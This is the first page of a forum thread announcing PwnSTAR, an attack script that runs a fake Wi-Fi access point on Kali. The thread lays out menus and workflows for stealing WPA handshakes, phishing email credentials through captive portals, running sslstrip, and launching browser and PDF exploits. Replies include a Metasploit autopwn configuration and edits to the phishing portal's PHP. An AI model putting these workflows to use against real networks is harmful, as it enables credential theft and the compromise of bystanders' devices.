Page 1 of 10 123 ... LastLast
Results 1 to 10 of 95

Thread: PwnSTAR running on Kali

  1. #1
    Member
    Join Date
    Mar 2013
    Location
    Totally lost
    Posts
    45

    PwnSTAR running on Kali

    PwnSTAR (Pwn SofT Ap scRipt) now runs on Kali.

    https://github.com/SilverFoxx/PwnSTAR

    Features
    takes care of configuration of interfaces, macspoofing, airbase-ng and isc-dhcp-server
    steals WPA handshakes
    phishes email credentials
    serves webpages: supplied (eg hotspot, below) or provide your own
    sniffing with ferret and sslstrip
    adds a captive portal to the frontend of the fake AP
    assorted exploits
    de-auth with MDK3, aireplay-ng or airdrop-ng

    Use your imagination, craft your own webpages, and have fun.

    Vulpi

    Last edited by Vulpi; 04-19-2014 at 07:03 AM.

  2. #2
    Member
    Join Date
    Mar 2013
    Location
    Totally lost
    Posts
    45
    The README has some ideas on how to use it.
    Code:
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                       Basic Menu
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        
        1) Honeypot: get the victim onto your AP, then use nmap, metasploit etc
                     no internet access given
        
        2) Grab WPA handshake
        
        3) Sniffing: provide internet access, then be MITM
        
        4) Simple web server with dnsspoof: redirect the victim to your webpage
           
        5) Karmetasploit
        
        6) Browser_autopwn
    1) Relies on auto-connections ie the device connnects without the owner being aware. You can then attempt to exploit it.
    Target the fake-AP ESSID to something the device has likely connected to previously eg Starbucks WiFi

    2) Sometimes it is easier to steal the handshake than sniff it passively. Set up the AP with the same name and channel as the target, and then DOS the target.
    Airbase will save a pcap containing the handshake to /root/PwnSTAR-n.cap.

    3) Provides an open network, so you can sniff the victim's activities.

    4) Uses apache to serve a webpage. There is an option to load your own page eg one you have cloned. The provided page (hotspot_3) asks for email details.
    Note the client is forced to the page by DNS spoofing. They can only proceed to the internet if you manually stop dnsspoof.
    DNS-caching in the client is a problem with this technique. The captive portal in the advanced menu is a better way of hosting hotspot_3

    5&6) Provides all the arduous config files to properly set-up these attacks.


    Browser_autopwn gaining shells against Windows Vista:




    Code:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                       Advanced Menu
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
        a) Captive portals (phish/sniff)
        
        b) Captive portal + PDF exploit (targets Adobe Reader < v9.3)
    
        c) MSXML 0day (CVE-2012-1889: MSXML Uninitialized Memory Corruption)
        
        d) Java_jre17_jmxbean
        
        e) Choose another browser exploit

    a) Uses iptables rules to route the clients. Is essentially a fully functioning captive portal.
    Avoids the problems of spoofing.

    1) Serves hotspot3. Allows clients onto the internet once credentials are given.

    2) Allows you to add a personal header to the index.php.
    You could probably copy the php functions from this page onto a cloned page and load that instead.

    b) A captive portal which blocks the client until they have downloaded a pdf. This contains a malicious java applet.
    Includes a virgin pdf to which you can add your own payload.

    c&d) Launches a couple of example browser exploits

    e) Gives a skeleton framework for loading any browser exploit of your choice.
    Edit PwnSTAR browser_exploit_fn directly for more control.


    Two clients being simultaneously handled by the captive portal:



    Have fun, and READ THE SCRIPT!
    Vulpi
    Last edited by Vulpi; 04-19-2014 at 07:06 AM.

  3. #3
    Senior Member
    Join Date
    Mar 2013
    Posts
    270
    Thank you! Love your script
    Fact, Science and the Pursuit of Knowledge. Working to secure your networks from threats; Outside and Within.

  4. #4
    Junior Member
    Join Date
    Mar 2013
    Posts
    9
    I will try that out as soon as I have time to install Kali (first release was bugged for me, keyboard stuff).
    I am reading through the code, and it's very neat.


    Vulpi, I used to do the same as you :
    Code:
    read apusage
    	if [[ $apusage = q ]];then
    		exit_fn
        elif [[ $apusage != [1-6] && $apusage != 9 ]];then
            first_fn
        elif [[ $apusage = 9 ]];then
            adv_usage_fn
    	fi
    But I was hinted to use case in ... esac instead, and it's way better. For instance, instead of this barbarian line :"elif [[ $apusage != [1-6] && $apusage != 9 ]];then first_fn" you would jut have to write *) first_fn ;;
    I use some of those in Yamas, you should check it out. It's aslo quite easy to replace. "edit" : I see you use it later on in the script, so you should be all right!

    Code:
                if [[ $var = n ]];then
                    internet=
                    interface_fn
                fi
                if [[ $var = y ]];then
                    if [[ $apusage = 3 || $apusage = a || $apusage = b || $apusage = c ]];then
                        echo -e "$warn\nDuh, won't work without an internet interface. Start again"
                        sleep 2
                        interface_fn
                    fi
                fi
    Shouldn't that be one big if with sub ifs, and an elif in case neither y nor n are entered ?

    Code:
    $API is in use, stupid. Try another interface
    Code:
    elif [[ $initial_scan != n ]];then  # any value other than n restarts the function
            echo -e "$warn\nWhat's it gunna be babe...yes or no?"
    ahah Havin' fun are ya boy ?

    Code:
    echo -e "$info\nConsider using yamas or easy-creds to parse logs"
    cheers!

    Code:
    echo "use auxiliary/server/browser_autopwn" > /tmp/karma.rc
        echo "setg AUTOPWN_HOST $ap_ip" >> /tmp/karma.rc
        echo "setg AUTOPWN_PORT 55550" >> /tmp/karma.rc
        echo "setg AUTOPWN_URI /ads" >> /tmp/karma.rc
        echo "set LHOST $ap_ip" >> /tmp/karma.rc
        echo "set LPORT 45000" >> /tmp/karma.rc
        echo "set SRVPORT 55550" >> /tmp/karma.rc
        echo "set URIPATH /ads" >> /tmp/karma.rc
        echo "run" >> /tmp/karma.rc
    
    ---SNIP---
    Why not :
    Code:
    echo -en "setg AUTOPWN_HOST $ap_ip
    setg AUTOPWN_PORT 55550
    setg AUTOPWN_URI /ads
    set LHOST $ap_ip
    ---SNIP---
    set URIPATH /ads
    run" > /tmp/karma.rc
    since you're always writing in the same file?

    That's all for now! More feedback when I get my hand on it!
    Last edited by sickness; 04-12-2013 at 08:59 PM.

  5. #5
    Member
    Join Date
    Mar 2013
    Location
    Totally lost
    Posts
    45
    Thank you! Love your script
    Thanks charonsecurity. Let me know if you find any bugs.

  6. #6
    Member
    Join Date
    Mar 2013
    Location
    Totally lost
    Posts
    45
    I am reading through the code, and it's very neat
    I should hope so - the first script I ever studied was yamas!

    All your comments are valid. The script started out very small; as it grew I simply added more elifs etc. If I was starting from scratch I would do things differently - but I'm too lazy to re-write it!

    PS It only took me a few minutes to get yamas running on Kali - your fans are waiting

  7. #7
    Junior Member
    Join Date
    Apr 2013
    Posts
    2
    Hi, it's a great tools....
    But i try to change Portal_simple php. How many I can change the email and password default page to password 1 and password 2?
    if password 1 and password 2 are the same itīs ok you are authorized.

  8. #8
    Member
    Join Date
    Mar 2013
    Location
    Totally lost
    Posts
    45
    In index.php, change this line to whatever you want (presumably "Email address" to "Password 1"):
    PHP Code:
     <tr><td>Email address:</td><td><input type='text' name='email'></td></tr
    In service.php, this is the line to change:
    PHP Code:
     if(($email == "") || ($password == "")){ 
    You probably want something like "if $email != $password" etc.
    There are lots of good "learn php in a weekend" tutorials on the net.

  9. #9
    Junior Member
    Join Date
    Apr 2013
    Posts
    2

    Smile

    Quote Originally Posted by Vulpi View Post
    In index.php, change this line to whatever you want (presumably "Email address" to "Password 1"):
    PHP Code:
     <tr><td>Email address:</td><td><input type='text' name='email'></td></tr
    In service.php, this is the line to change:
    PHP Code:
     if(($email == "") || ($password == "")){ 
    You probably want something like "if $email != $password" etc.
    There are lots of good "learn php in a weekend" tutorials on the net.
    I change you're portal_simple to this,
    portal_simpleOK.rar (10 KB)
    https://mega.co.nz/#!fpZFjYQA!ObqAaU...vBk2Oc28zSoVag
    The original is from Technic Dynamic.
    Now if password is wrong or blank, show error.
    If you can put this in a named portal like "portal_wpa" in you're next release.
    Enjoy.
    Last edited by jamyz; 04-24-2013 at 06:12 AM.

  10. #10
    Member
    Join Date
    Mar 2013
    Location
    Totally lost
    Posts
    45
    I can't access the mega download. However, the WPA pages by Deathcorps (http://www.backtrack-linux.org/forum...ad.php?t=47021) do work for me. If you are having problems the first thing I would suggest is to check all the permissions are correct (see script readme).

    This attack doesn't need hardcoding into PwnSTAR. The idea is that you can use the script to launch whatever cloned website you wish (Basic menu option 4 "Simple web server with dnsspoof").

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •